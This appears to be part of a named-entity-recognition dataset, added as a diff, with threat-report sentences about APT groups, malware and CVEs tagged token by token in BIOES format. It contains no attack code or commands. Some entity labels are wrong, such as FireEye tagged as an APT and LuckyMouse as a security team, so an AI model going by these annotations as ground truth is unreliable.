+the O
+victim’s O
+network O
+, O
+with O
+the O
+earliest O
+evidence O
+of O
+activity O
+dating O
+to O
+November B-TIME
+2017 E-TIME
+. O
+Waterbug’s S-APT
+intrusions O
+on O
+the O
+victim’s O
+network O
+continued O
+for O
+much O
+of O
+2018 S-TIME
+. O
+Symantec S-SECTEAM
+did O
+not O
+observe O
+the O
+initial O
+access O
+point O
+and O
+the O
+close O
+timeframe O
+between O
+Waterbug S-APT
+observed O
+activity O
+on O
+the O
+victim’s O
+network O
+and O
+its O
+observed O
+use O
+of O
+Crambus O
+infrastructure O
+suggests O
+that O
+Waterbug S-APT
+may O
+have O
+used O
+the O
+Crambus B-IDTY
+infrastructure E-IDTY
+as O
+an O
+initial O
+access O
+point O
+. O
+
+It O
+also O
+reconfigures O
+the O
+Microsoft S-IDTY
+Sysinternals O
+registry O
+to O
+prevent O
+pop-ups O
+when O
+running O
+the O
+PsExec B-MAL
+tool E-MAL
+. O
+Waterbug S-APT
+also O
+used O
+an O
+older O
+version O
+of O
+PowerShell S-MAL
+, O
+likely O
+to O
+avoid O
+logging O
+. O
+In O
+one O
+of O
+these O
+campaigns O
+, O
+Waterbug S-APT
+used O
+a O
+USB B-MAL
+stealer E-MAL
+that O
+scans O
+removable O
+storage O
+devices O
+to O
+identify O
+and O
+collect O
+files O
+of O
+interest O
+. O
+The O
+malware S-FILE
+then O
+uses O
+WebDAV S-MAL
+to O
+upload O
+the O
+RAR B-FILE
+archive E-FILE
+to O
+a O
+Box O
+account O
+. O
+
+The O
+DeepSight B-SECTEAM
+Managed I-SECTEAM
+Adversary E-SECTEAM
+and O
+Threat B-SECTEAM
+Intelligence E-SECTEAM
+team O
+co-authored O
+this O
+blog O
+and O
+its O
+customers O
+have O
+received O
+intelligence O
+with O
+additional O
+details O
+about O
+these O
+campaigns O
+, O
+the O
+characteristics O
+of O
+the O
+Waterbug S-APT
+( O
+aka O
+Turla S-APT
+) O
+Cyber B-ACT
+Espionage E-ACT
+group O
+, O
+and O
+methods O
+of O
+detecting O
+and O
+thwarting O
+activities O
+of O
+this O
+adversary O
+. O
+The O
+DeepSight B-SECTEAM
+MATI I-SECTEAM
+team E-SECTEAM
+authored O
+this O
+blog O
+and O
+its O
+customers O
+have O
+received O
+intelligence O
+with O
+additional O
+details O
+about O
+these O
+campaigns S-ACT
+, O
+the O
+characteristics O
+of O
+the O
+Waterbug S-APT
+Cyber B-ACT
+Espionage E-ACT
+group O
+, O
+and O
+methods O
+of O
+detecting S-ACT
+and O
+thwarting B-ACT
+activities E-ACT
+of O
+this O
+adversary O
+. O
+While O
+reviewing O
+a O
+2015 S-TIME
+report⁵ O
+of O
+a O
+Winnti S-APT
+intrusion O
+at O
+a O
+Vietnamese B-IDTY
+gaming I-IDTY
+company E-IDTY
+, O
+we O
+identified O
+a O
+small O
+cluster O
+of O
+Winnti⁶ S-APT
+samples O
+designed O
+specifically O
+for O
+Linux⁷ O
+. O
+Following O
+these O
+reports O
+, O
+Chronicle S-SECTEAM
+researchers O
+doubled O
+down O
+on O
+efforts O
+to O
+try O
+to O
+unravel O
+the O
+various O
+campaigns O
+where O
+Winnti S-APT
+was O
+leveraged O
+. O
+Distinct O
+changes O
+to O
+Azazel S-MAL
+by O
+the O
+Winnti B-APT
+developers E-APT
+include O
+the O
+addition O
+of O
+a O
+function O
+named O
+‘Decrypt2’ O
+, O
+which O
+is O
+used O
+to O
+decode O
+an O
+embedded O
+configuration O
+similar O
+to O
+the O
+core O
+implant O
+. O
+Zebrocy S-APT
+activity O
+initiates O
+with O
+spearphishing S-ACT
+operations O
+delivering O
+various O
+target O
+profilers O
+and O
+downloaders O
+without O
+the O
+use O
+of O
+any O
+0day B-VULID
+exploits S-VULNAME
+. O
+We O
+will O
+see O
+more O
+from O
+Zebrocy S-APT
+into O
+2019 S-TIME
+on O
+government S-IDTY
+and O
+military S-IDTY
+related O
+organizations O
+. O
+The O
+PowerShell B-MAL
+script E-MAL
+will O
+look O
+at O
+the O
+architecture O
+of O
+the O
+system O
+to O
+check O
+which O
+malicious B-FILE
+DLL I-FILE
+files E-FILE
+should O
+be O
+downloaded O
+. O
+In O
+the O
+same O
+year O
+, O
+Silence S-APT
+conducted O
+DDoS B-ACT
+attacks E-ACT
+using O
+the O
+Perl B-MAL
+IRC I-MAL
+bot E-MAL
+and O
+public B-MAL
+IRC E-MAL
+chats O
+to O
+control O
+Trojans O
+. O
+The O
+FBI S-SECTEAM
+issued O
+a O
+rare O
+bulletin O
+admitting O
+that O
+a O
+group O
+named O
+APT6 S-APT
+hacked O
+into O
+US B-IDTY
+government E-IDTY
+computer O
+systems O
+as O
+far O
+back O
+as O
+2011 S-TIME
+and O
+for O
+years O
+stole O
+sensitive O
+data O
+. O
+FireEye B-SECTEAM
+iSIGHT E-SECTEAM
+Intelligence O
+believes O
+that O
+APT37 S-APT
+is O
+aligned O
+with O
+the O
+activity O
+publicly O
+reported O
+as O
+Scarcruft S-APT
+and O
+Group123 S-APT
+. O
+Trend B-SECTEAM
+Micro E-SECTEAM
+attributes O
+this O
+activity O
+to O
+MuddyWater S-APT
+, O
+an O
+Iran-nexus O
+actor S-APT
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+May B-TIME
+2017 E-TIME
+. O
+FireEye S-SECTEAM
+assess O
+that O
+the O
+actors S-APT
+employing O
+this O
+latest O
+Flash S-TOOL
+zero-day S-ACT
+are O
+a O
+suspected O
+North B-LOC
+Korean E-LOC
+group O
+we O
+track O
+as O
+TEMP.Reaper S-APT
+. O
+FireEye S-SECTEAM
+has O
+observed O
+other O
+suspected O
+North B-LOC
+Korean E-LOC
+threat O
+groups O
+such O
+as O
+TEMP.Hermit S-APT
+employ O
+wiper O
+malware O
+in O
+disruptive O
+attacks O
+. O
+On O
+Nov14 S-TIME
+, O
+2017 S-TIME
+, O
+FireEye S-SECTEAM
+observed O
+APT34 S-APT
+using O
+an O
+exploit S-VULNAME
+for O
+the O
+Microsoft S-IDTY
+Office O
+vulnerability S-VULNAME
+to O
+target O
+a O
+government B-IDTY
+organization E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+Kaspersky S-SECTEAM
+reveals O
+that O
+APT33 S-APT
+is O
+a O
+capable O
+group O
+that O
+has O
+carried O
+out O
+Cyber B-ACT
+Espionage E-ACT
+operations O
+since O
+at O
+least O
+2013 S-TIME
+. O
+APT33 S-APT
+is O
+the O
+only O
+group O
+that O
+Kaspersky S-SECTEAM
+has O
+observed O
+use O
+the O
+DROPSHOT B-MAL
+dropper E-MAL
+. O
+The O
+Cyber B-ACT
+Espionage E-ACT
+group O
+APT32 S-APT
+heavily O
+obfuscates O
+their O
+backdoors S-MAL
+and O
+scripts S-MAL
+, O
+and O
+Mandiant O
+consultants O
+observed O
+APT32 S-APT
+implement O
+additional O
+command O
+argument O
+obfuscation O
+in O
+April S-TIME
+2017 S-TIME
+. O
+In O
+all O
+Mandiant S-SECTEAM
+investigations O
+to O
+date O
+where O
+the O
+CARBANAK O
+backdoor O
+has O
+been O
+discovered O
+, O
+the O
+activity O
+has O
+been O
+attributed O
+to O
+the O
+FIN7 S-APT
+threat O
+group O
+. O
+Kaspersky S-SECTEAM
+released O
+a O
+similar O
+report O
+about O
+the O
+same O
+group O
+under O
+the O
+name O
+Carbanak S-APT
+in O
+February B-TIME
+2015 E-TIME
+. O
+FireEye S-SECTEAM
+assesses O
+that O
+APT32 O
+leverages O
+a O
+unique O
+suite O
+of O
+fully-featured O
+malware O
+. O
+FireEye S-SECTEAM
+has O
+observed O
+APT32 S-APT
+targeting O
+foreign O
+corporations O
+with O
+a O
+vested O
+interest O
+in O
+Vietnam’s B-IDTY
+manufacturing E-IDTY
+, O
+consumer B-IDTY
+products E-IDTY
+, O
+and O
+hospitality S-IDTY
+sectors O
+. O
+The O
+FireEye S-SECTEAM
+iSIGHT S-SECTEAM
+Intelligence O
+MySIGHT O
+Portal O
+contains O
+additional O
+information O
+on O
+these O
+backdoor O
+families O
+based O
+on O
+Mandiant S-SECTEAM
+investigations O
+of O
+APT32 S-APT
+intrusions O
+. O
+FireEye S-SECTEAM
+assesses O
+that O
+APT32 S-APT
+is O
+a O
+Cyber B-ACT
+Espionage E-ACT
+group O
+aligned O
+with O
+Vietnamese S-IDTY
+government S-IDTY
+interests O
+. O
+In O
+May S-TIME
+and O
+June B-TIME
+2017 E-TIME
+, O
+FireEye S-SECTEAM
+has O
+associated O
+this O
+campaign O
+with O
+APT19 S-APT
+, O
+a O
+group O
+that O
+we O
+assess O
+is O
+composed O
+of O
+freelancers O
+, O
+with O
+some O
+degree O
+of O
+sponsorship O
+by O
+the O
+Chinese B-IDTY
+government E-IDTY
+. O
+APT10 S-APT
+is O
+a O
+Chinese O
+Cyber B-ACT
+Espionage E-ACT
+group O
+that O
+FireEye S-APT
+has O
+tracked O
+since O
+2009 S-TIME
+. O
+In O
+addition O
+to O
+the O
+spear B-ACT
+phishes E-ACT
+, O
+FireEye B-SECTEAM
+ISIGHT I-SECTEAM
+Intelligence E-SECTEAM
+has O
+observed O
+APT10 S-APT
+accessing O
+victims O
+through O
+global O
+service O
+providers O
+. O
+FireEye’s S-SECTEAM
+visibility O
+into O
+the O
+operations O
+of O
+APT28 S-APT
+– O
+a O
+group O
+we O
+believe O
+the O
+Russian B-IDTY
+government E-IDTY
+sponsors O
+– O
+has O
+given O
+us O
+insight O
+into O
+some O
+of O
+the O
+government’s O
+targets O
+, O
+as O
+well O
+as O
+its O
+objectives O
+and O
+the O
+activities O
+designed O
+to O
+further O
+them O
+. O
+FireEye S-SECTEAM
+has O
+tracked O
+and O
+profiled O
+APT28 S-APT
+group O
+through O
+multiple O
+investigations O
+, O
+endpoint O
+and O
+network O
+detections O
+, O
+and O
+continuous O
+monitoring O
+. O
+In O
+April B-TIME
+2015 E-TIME
+, O
+FireEye S-SECTEAM
+uncovered O
+the O
+malicious O
+efforts O
+of O
+APT30 S-APT
+, O
+a O
+suspected O
+China-based S-LOC
+threat O
+group O
+. O
+FireEye B-SECTEAM
+iSIGHT E-SECTEAM
+Intelligence O
+has O
+been O
+tracking S-ACT
+a O
+pair O
+of O
+cybercriminals O
+that O
+we O
+refer O
+to O
+as O
+the O
+Vendetta B-APT
+Brothers E-APT
+. O
+Google S-SECTEAM
+and O
+Microsoft S-SECTEAM
+have O
+already O
+confirmed O
+the O
+Russian O
+hacker O
+group O
+APT28 S-APT
+used O
+a O
+Flash S-TOOL
+vulnerability O
+CVE-2016-7855 S-VULID
+along O
+with O
+this O
+kernel O
+privilege O
+escalation O
+flaw O
+to O
+perform O
+a O
+targeted O
+attack O
+. O
+
+McAfee S-SECTEAM
+concludes O
+that O
+some O
+groups—and O
+especially O
+the O
+Poetry O
+Group S-APT
+—have O
+shifted O
+tactics O
+to O
+use O
+Citadel O
+in O
+ACTs O
+other O
+than O
+what O
+it O
+was O
+originally O
+intended O
+for O
+. O
+McAfee S-SECTEAM
+Advanced O
+Threat O
+research O
+determines O
+with O
+confidence O
+that O
+Lazarus S-APT
+is O
+the O
+threat O
+group O
+behind O
+this O
+attack O
+for O
+the O
+following O
+reasons:Contacts O
+an O
+IP S-PROT
+address O
+/ O
+domain O
+that O
+was O
+used O
+to O
+host O
+a O
+malicious B-FILE
+document E-FILE
+from O
+a O
+Lazarus S-APT
+previous O
+campaign O
+in O
+2017 S-TIME
+. O
+In O
+November B-TIME
+2017 E-TIME
+, O
+Talos S-SECTEAM
+observed O
+the O
+Group123 S-APT
+, O
+which O
+included O
+a O
+new O
+version O
+of O
+ROKRAT O
+being O
+used O
+in O
+the O
+latest O
+wave O
+of O
+attacks O
+. O
+In O
+addition O
+to O
+TALOS S-SECTEAM
+investigation O
+on O
+KONNI S-MAL
+, O
+on O
+July B-TIME
+18 I-TIME
+2017 E-TIME
+, O
+BitDefender O
+released O
+a O
+whitepaper O
+on O
+DarkHotel S-APT
+. O
+According O
+to O
+security O
+360 B-SECTEAM
+Threat I-SECTEAM
+Intelligence I-SECTEAM
+Center E-SECTEAM
+, O
+Goldmouse O
+was O
+observed O
+deploying O
+the O
+nebulous O
+njRAT B-FILE
+backdoor E-FILE
+. O
+ESET S-SECTEAM
+has O
+also O
+reported O
+PowerShell B-MAL
+scripts E-MAL
+being O
+used O
+by O
+Turla S-APT
+to O
+provide O
+direct O
+, O
+in-memory O
+loading O
+and O
+execution O
+of O
+malware O
+. O
+Additionally O
+Kaspersky S-SECTEAM
+identified O
+a O
+new O
+backdoor S-FILE
+that O
+we O
+attribute O
+with O
+medium O
+confidence O
+to O
+Turla S-APT
+. O
+Researchers O
+at O
+Symantec S-SECTEAM
+suspect O
+that O
+Turla S-APT
+used O
+the O
+hijacked O
+network O
+to O
+attack O
+a O
+Middle B-LOC
+Eastern E-LOC
+government S-IDTY
+. O
+Symantec S-SECTEAM
+researchers O
+have O
+uncovered O
+evidence O
+that O
+the O
+Waterbug S-APT
+APT O
+group O
+has O
+conducted O
+a O
+hostile O
+takeover O
+of O
+an O
+attack O
+platform O
+. O
+Researchers O
+at O
+the O
+Microstep B-SECTEAM
+Intelligence I-SECTEAM
+Bureau E-SECTEAM
+have O
+published O
+a O
+report O
+on O
+targeted O
+attacks O
+on O
+the O
+Ukrainian B-IDTY
+government E-IDTY
+that O
+they O
+attribute O
+to O
+the O
+Gamaredon S-APT
+threat O
+actor O
+. O
+Kaspersky S-SECTEAM
+found O
+an O
+active B-ACT
+campaign E-ACT
+by O
+a O
+Chinese S-LOC
+APT O
+group O
+we O
+call O
+SixLittleMonkeys S-APT
+that O
+uses O
+a O
+new O
+version O
+of O
+the O
+Microcin B-MAL
+Trojan E-MAL
+and O
+a O
+RAT S-MAL
+that O
+we O
+call O
+HawkEye O
+as O
+a O
+last O
+stager O
+. O
+Trend B-SECTEAM
+Micro E-SECTEAM
+has O
+previously O
+reported O
+the O
+use O
+of O
+this O
+malware O
+in O
+targeted O
+attacks O
+by O
+the O
+BlackTech S-APT
+group O
+, O
+primarily O
+focused O
+on O
+cyber-espionage O
+in O
+Asia S-LOC
+. O
+LuckyMouse S-APT
+activity O
+detected O
+by O
+Palo B-SECTEAM
+Alto E-SECTEAM
+involved O
+the O
+attackers O
+installing O
+web B-MAL
+shells E-MAL
+on O
+SharePoint O
+servers O
+to O
+compromise O
+government B-IDTY
+organizations E-IDTY
+in O
+the O
+Middle S-LOC
+East S-LOC
+. O
+Talos S-SECTEAM
+published O
+its O
+analysis O
+of O
+the O
+BlackWater B-ACT
+campaign E-ACT
+, O
+related O
+to O
+MuddyWater S-APT
+group O
+. O
+Trend B-SECTEAM
+Micro E-SECTEAM
+also O
+reported O
+MuddyWater’s S-APT
+use O
+of O
+a O
+new O
+multi-stage O
+PowerShell-based O
+backdoor O
+called O
+POWERSTATS B-FILE
+v3 E-FILE
+. O
+Regarding O
+other O
+groups S-APT
+, O
+Kaspersky S-SECTEAM
+discovered O
+new O
+activity O
+related O
+to O
+ZooPark S-APT
+, O
+a O
+cyber-espionage O
+threat O
+actor O
+that O
+has O
+focused O
+mainly O
+on O
+stealing B-ACT
+data E-ACT
+from O
+Android S-OS
+devices O
+. O
+Recorded B-SECTEAM
+Future E-SECTEAM
+published O
+an O
+analysis O
+of O
+the O
+infrastructure O
+built O
+by O
+APT33 S-APT
+( O
+aka O
+Elfin S-APT
+) O
+to O
+target O
+Saudi S-LOC
+organizations O
+. O
+
+Early O
+in O
+Q2 O
+, O
+Kaspersky S-SECTEAM
+identified O
+an O
+interesting O
+Lazarus S-APT
+attack O
+targeting O
+a O
+mobile B-IDTY
+gaming E-IDTY
+company O
+in O
+South B-LOC
+Korea E-LOC
+that O
+we O
+believe O
+was O
+aimed O
+at O
+stealing O
+application O
+source O
+code O
+. O
+In O
+a O
+recent O
+campaign O
+, O
+Kaspersky S-SECTEAM
+observed O
+ScarCruft S-APT
+using O
+a O
+multi-stage O
+binary O
+to O
+infect O
+several O
+victims O
+and O
+ultimately O
+install O
+a O
+final O
+payload O
+known O
+as O
+ROKRAT S-MAL
+– O
+a O
+cloud O
+service-based O
+backdoor O
+. O
+ESET S-SECTEAM
+recently O
+analyzed O
+a O
+new O
+Mac O
+OS O
+sample S-FILE
+from O
+the O
+OceanLotus S-APT
+group O
+that O
+had O
+been O
+uploaded B-ACT
+to I-ACT
+VirusTotal E-ACT
+. O
+The O
+threat O
+actor S-APT
+behind O
+the O
+campaign O
+, O
+which O
+Kaspersky S-SECTEAM
+believes O
+to O
+be O
+the O
+PLATINUM S-SECTEAM
+APT O
+group O
+, O
+uses O
+an O
+elaborate O
+, O
+previously O
+unseen O
+, O
+steganographic O
+technique O
+to O
+conceal O
+communication O
+. O
+FireEye S-SECTEAM
+defined O
+APT40 S-SECTEAM
+as O
+the O
+Chinese S-LOC
+state-sponsored O
+threat O
+actor O
+previously O
+reported O
+as O
+TEMP.Periscope S-APT
+, O
+Leviathan S-APT
+and O
+TEMP.Jumper S-APT
+. O
+In O
+January S-TIME
+, O
+Kaspersky S-SECTEAM
+identified O
+new O
+activity O
+by O
+the O
+Transparent O
+Tribe O
+APT O
+group O
+aka O
+PROJECTM S-APT
+and O
+MYTHIC B-APT
+LEOPARD E-APT
+, O
+a O
+threat O
+actor O
+with O
+interests O
+aligned O
+with O
+Pakistan O
+that O
+has O
+shown O
+a O
+persistent O
+focus O
+on O
+Indian S-LOC
+military S-IDTY
+targets O
+. O
+OceanLotus S-APT
+was O
+another O
+actor O
+active O
+during O
+this O
+period O
+, O
+using O
+a O
+new O
+downloader O
+called O
+KerrDown S-MAL
+, O
+as O
+reported O
+by O
+Palo B-SECTEAM
+Alto E-SECTEAM
+. O
+ESET S-SECTEAM
+recently O
+uncovered O
+a O
+new O
+addition O
+to O
+OceanLotus’s S-APT
+toolset O
+targeting O
+Mac O
+OS O
+. O
+In O
+mid-2018 S-TIME
+, O
+Kaspersky's S-SECTEAM
+report O
+on O
+Operation O
+AppleJeus” O
+highlighted O
+the O
+focus O
+of O
+the O
+Lazarus S-APT
+threat O
+actor O
+on O
+cryptocurrency O
+exchanges O
+. O
+Kaspersky S-SECTEAM
+also O
+observed O
+some O
+activity O
+from O
+Gaza O
+Team O
+and O
+MuddyWater S-APT
+. O
+Kaspersky S-SECTEAM
+wrote O
+about O
+LuckyMouse S-SECTEAM
+targeting O
+national O
+data O
+centers O
+in O
+June S-TIME
+. O
+Kaspersky S-SECTEAM
+also O
+discovered O
+that O
+LuckyMouse S-SECTEAM
+unleashed O
+a O
+new O
+wave O
+of O
+activity O
+targeting O
+Asian S-LOC
+governmental O
+organizations O
+just O
+around O
+the O
+time O
+they O
+had O
+gathered O
+for O
+a O
+summit O
+in O
+China S-LOC
+. O
+Kaspersky S-SECTEAM
+have O
+observed O
+similar O
+activity O
+in O
+the O
+past O
+from O
+groups O
+such O
+as O
+Oilrig S-APT
+and O
+Stonedrill S-APT
+, O
+which O
+leads O
+us O
+to O
+believe O
+the O
+new O
+attacks O
+could O
+be O
+connected O
+, O
+though O
+for O
+now O
+that O
+connection O
+is O
+only O
+assessed O
+as O
+low O
+confidence O
+. O
+In O
+August B-TIME
+2019 E-TIME
+, O
+FireEye S-SECTEAM
+released O
+the O
+Double O
+Dragon” O
+report O
+on O
+our O
+newest O
+graduated O
+threat O
+group O
+, O
+APT41 S-APT
+. O
+Today O
+, O
+FireEye S-SECTEAM
+Intelligence O
+is O
+releasing O
+a O
+comprehensive O
+report O
+detailing O
+APT41 S-APT
+, O
+a O
+prolific O
+Chinese S-LOC
+cyber O
+threat O
+group O
+that O
+carries O
+out O
+state-sponsored O
+espionage O
+activity O
+in O
+parallel O
+with O
+financially S-IDTY
+motivated O
+operations O
+. O
+Group-IB S-SECTEAM
+experts O
+continuously O
+monitor O
+the O
+Silence’ S-APT
+activities O
+. O
+Group-IB S-SECTEAM
+has O
+uncovered O
+a O
+hacker O
+group O
+, O
+MoneyTaker S-APT
+, O
+attacking O
+banks S-IDTY
+in O
+the O
+USA S-LOC
+and O
+Russia S-LOC
+. O
+Group-IB S-SECTEAM
+reveals O
+the O
+unknown O
+details O
+of O
+attacks O
+from O
+one O
+of O
+the O
+most O
+notorious O
+APT O
+groups O
+, O
+Lazarus S-APT
+. O
+Finally O
+, O
+Kaspersky S-SECTEAM
+produced O
+a O
+summary O
+report O
+on O
+Sofacy’s S-APT
+summertime O
+activity O
+. O
+Kaspersky S-SECTEAM
+were O
+also O
+able O
+to O
+produce O
+two O
+reports O
+on O
+Korean S-LOC
+speaking O
+actors O
+, O
+specifically O
+involving O
+Scarcruft S-APT
+and O
+Bluenoroff S-APT
+. O
+Analysis O
+of O
+the O
+payload O
+allowed O
+us O
+to O
+confidently O
+link O
+this O
+attack O
+to O
+an O
+actor O
+Kaspersky S-SECTEAM
+track O
+as O
+BlackOasis S-APT
+. O
+Kaspersky S-SECTEAM
+first O
+became O
+aware O
+of O
+BlackOasis’ S-APT
+activities O
+in O
+May B-TIME
+2016 E-TIME
+, O
+while O
+investigating O
+another O
+Adobe O
+Flash S-TOOL
+zero B-VULNAME
+day E-VULNAME
+. O
+
+It O
+contains O
+a O
+Word S-TOOL
+document O
+in O
+plaintext O
+( O
+written O
+to O
+Bienvenue_a_Sahaja_Yoga_Toulouse.doc S-FILE
+) O
+, O
+along O
+with O
+an O
+executable O
+( O
+Update.exe S-FILE
+) O
+and O
+DLL S-TOOL
+( O
+McUpdate.dll S-FILE
+) O
+. O
+
+We O
+identified O
+decoy B-FILE
+files E-FILE
+which O
+indicate O
+these O
+attacks O
+began O
+with O
+spear B-ACT
+phishing I-ACT
+messages E-ACT
+but O
+have O
+not O
+observed O
+the O
+actual O
+messages O
+. O
+
+Additionally O
+, O
+these O
+decoy B-FILE
+documents E-FILE
+are O
+hosted O
+on O
+legitimate O
+websites O
+including O
+a O
+government O
+website O
+belonging O
+to O
+the O
+Cambodia B-IDTY
+Government E-IDTY
+and O
+in O
+at O
+least O
+once O
+case O
+, O
+Facebook S-IDTY
+. O
+
+However O
+, O
+the O
+unique O
+malware O
+variant O
+, O
+BlackEnergy B-FILE
+3 E-FILE
+, O
+reemerged O
+in O
+Ukraine S-LOC
+early O
+in O
+2015 S-TIME
+, O
+where O
+we O
+had O
+first O
+found O
+Sandworm B-APT
+Team E-APT
+. O
+
+The O
+initial O
+indicator O
+of O
+the O
+attack O
+was O
+a O
+malicious O
+Web B-TOOL
+shell E-TOOL
+that O
+was O
+detected O
+on O
+an O
+IIS S-TOOL
+server O
+, O
+coming O
+out O
+of O
+the O
+w3wp.exe S-FILE
+process O
+. O
+
+We O
+have O
+previously O
+detected O
+groups S-APT
+we O
+suspect O
+are O
+affiliated O
+with O
+the O
+North B-LOC
+Korean E-LOC
+government S-IDTY
+compromising O
+electric S-IDTY
+utilities O
+in O
+South B-LOC
+Korea E-LOC
+, O
+but O
+these O
+compromises O
+did O
+not O
+lead O
+to O
+a O
+disruption O
+of O
+the O
+power O
+supply O
+. O
+Instead O
+, O
+sensitive O
+KHNP B-FILE
+documents E-FILE
+were O
+leaked O
+by O
+the O
+actors S-APT
+as O
+part O
+of O
+an O
+effort O
+to O
+exaggerate O
+the O
+access O
+they O
+had O
+and O
+embarrass O
+the O
+South B-IDTY
+Korean I-IDTY
+Government E-IDTY
+, O
+a O
+technique O
+we O
+assess O
+North B-LOC
+Korea E-LOC
+would O
+turn O
+to O
+again O
+in O
+order O
+to O
+instill O
+fear O
+and/or O
+meet O
+domestic O
+propaganda O
+aims O
+. O
+North B-LOC
+Korea E-LOC
+linked O
+hackers O
+are O
+among O
+the O
+most O
+prolific O
+nation-state O
+threats O
+, O
+targeting O
+not O
+only O
+the B-LOC
+U.S. E-LOC
+and O
+South B-LOC
+Korea E-LOC
+but O
+the O
+global O
+financial S-IDTY
+system O
+and O
+nations S-IDTY
+worldwide O
+. O
+
+The O
+malware S-MAL
+may O
+inject B-ACT
+itself E-ACT
+into O
+browser O
+processes O
+and O
+explorer.exe S-FILE
+. O
+
+In O
+the O
+last B-TIME
+few I-TIME
+weeks E-TIME
+, O
+FormBook S-FILE
+was O
+seen O
+downloading O
+other O
+malware O
+families O
+such O
+as O
+NanoCore S-FILE
+. O
+
+The O
+vulnerability O
+is O
+bypassing O
+most O
+mitigations; O
+however O
+, O
+as O
+noted O
+above O
+, O
+FireEye S-SECTEAM
+email S-TOOL
+and O
+network O
+products O
+detect O
+the O
+malicious B-FILE
+documents E-FILE
+. O
+
+Through O
+the O
+exploitation O
+of O
+the O
+HTA O
+handler O
+vulnerability O
+described O
+in O
+CVE-2017-1099 S-VULID
+, O
+the O
+observed O
+RTF S-TOOL
+attachments O
+download O
+. O
+
+In O
+early O
+May S-TIME
+, O
+the O
+phishing B-ACT
+lures E-ACT
+leveraged O
+RTF S-TOOL
+attachments O
+that O
+exploited O
+the O
+Microsoft S-IDTY
+Windows S-OS
+vulnerability O
+described O
+in O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+their O
+current O
+campaign O
+, O
+APT32 S-APT
+has O
+leveraged O
+ActiveMime B-FILE
+files E-FILE
+that O
+employ O
+social B-ACT
+engineering E-ACT
+methods O
+to O
+entice O
+the O
+victim O
+into O
+enabling O
+macros O
+. O
+
+APT32 S-APT
+actors O
+continue O
+to O
+deliver O
+the O
+malicious B-FILE
+attachments E-FILE
+via O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+Most O
+of O
+these O
+data-stealing O
+capabilities O
+were O
+present O
+in O
+the O
+oldest O
+variants O
+of O
+CARBANAK S-FILE
+that O
+we O
+have O
+seen O
+and O
+some O
+were O
+added O
+over O
+time O
+. O
+
+February S-TIME
+saw O
+three O
+particularly O
+interesting O
+publications O
+on O
+the O
+topic O
+of O
+macOS O
+malware: O
+a O
+Trojan S-MAL
+Cocoa O
+application O
+that O
+sends O
+system O
+information O
+including O
+keychain O
+data O
+back O
+to O
+the O
+attacker S-APT
+, O
+a O
+macOS O
+version O
+of O
+APT28’s S-APT
+Xagent O
+malware O
+, O
+and O
+a O
+new O
+Trojan B-FILE
+ransomware E-FILE
+. O
+
+As O
+early O
+as O
+March B-TIME
+4 E-TIME
+, O
+2017 S-TIME
+, O
+malicious B-FILE
+documents E-FILE
+exploiting O
+CVE-2017-0199 S-VULID
+were O
+used O
+to O
+deliver O
+the O
+LATENTBOT S-MAL
+malware S-MAL
+. O
+
+The O
+first O
+, O
+st07383.en17.docx S-FILE
+, O
+continues O
+by O
+utilizing O
+32 O
+or O
+64 O
+bit O
+versions O
+of O
+CVE-2017-0001 S-VULID
+to O
+escalate O
+privileges O
+before O
+executing O
+a O
+final O
+JavaScript O
+payload O
+containing O
+a O
+malware O
+implant O
+known O
+as O
+SHIRIME S-FILE
+. O
+
+This O
+vulnerability O
+was O
+found O
+in O
+a O
+document O
+named O
+Trump's_Attack_on_Syria_English.docx S-FILE
+. O
+
+To O
+install O
+and O
+register O
+the O
+malicious O
+shim O
+database O
+on O
+a O
+system O
+, O
+FIN7 S-APT
+used O
+a O
+custom O
+Base64 O
+encoded O
+PowerShell B-MAL
+script E-MAL
+, O
+which O
+ran O
+the O
+sdbinst.exe” S-FILE
+utility O
+to O
+register O
+a O
+custom O
+shim O
+database O
+file O
+containing O
+a O
+patch O
+onto O
+a O
+system O
+. O
+
+During O
+the O
+investigations O
+, O
+Mandiant S-SECTEAM
+observed O
+that O
+FIN7 S-APT
+used O
+a O
+custom O
+shim O
+database O
+to O
+patch O
+both O
+the O
+32-bit O
+and O
+64-bit O
+versions O
+of O
+services.exe” S-FILE
+with O
+their O
+CARBANAK S-MAL
+payload O
+. O
+
+We O
+have O
+not O
+yet O
+identified O
+FIN7’s S-APT
+ultimate O
+goal O
+in O
+this O
+campaign O
+, O
+as O
+we O
+have O
+either O
+blocked O
+the O
+delivery O
+of O
+the O
+malicious B-FILE
+emails E-FILE
+or O
+our O
+FaaS O
+team O
+detected O
+and O
+contained O
+the O
+attack O
+early O
+enough O
+in O
+the O
+lifecycle O
+before O
+we O
+observed O
+any O
+data O
+targeting O
+or O
+theft O
+. O
+
+Figure O
+1 O
+shows O
+a O
+sample O
+phishing B-FILE
+email E-FILE
+used O
+by O
+HawkEye B-ACT
+operators E-ACT
+in O
+this O
+latest O
+campaign O
+. O
+
+Many O
+groups O
+leverage O
+the O
+regsvr32.exe S-FILE
+application O
+whitelisting O
+bypass O
+, O
+including O
+APT19 S-APT
+in O
+their O
+2017 S-TIME
+campaign O
+against O
+law B-IDTY
+firms E-IDTY
+. O
+
+The O
+malware S-FILE
+was O
+initially O
+distributed O
+through O
+a O
+compromised O
+software O
+update O
+system O
+and O
+then O
+self-propagated O
+through O
+stolen B-ACT
+credentials E-ACT
+and O
+SMB B-ACT
+exploits E-ACT
+, O
+including O
+the O
+EternalBlue B-MAL
+exploit E-MAL
+used O
+in O
+the O
+WannaCry S-APT
+attack O
+from O
+May B-TIME
+2017 E-TIME
+. O
+
+The O
+malware S-FILE
+appends O
+encrypted O
+data O
+files O
+with O
+the O
+.WCRY B-FILE
+extension E-FILE
+, O
+drops O
+and O
+executes O
+a O
+decryptor O
+tool O
+, O
+and O
+demands O
+$300 O
+or O
+$600 O
+USD O
+to O
+decrypt O
+the O
+data O
+. O
+
+The O
+malware S-FILE
+then O
+builds O
+two O
+DLLs S-FILE
+in O
+memory O
+– O
+they O
+are O
+32 O
+and O
+64-bit O
+DLLs O
+that O
+have O
+identical O
+functionality O
+. O
+
+The O
+malware S-FILE
+continues O
+by O
+creating O
+a O
+service O
+named O
+mssecsvc2.0 S-FILE
+with O
+a O
+binary O
+path O
+pointing O
+to O
+the O
+running O
+module O
+with O
+the O
+arguments O
+-m O
+security O
+. O
+
+The O
+malware S-FILE
+then O
+writes O
+the O
+R O
+resource O
+data O
+to O
+the O
+file S-FILE
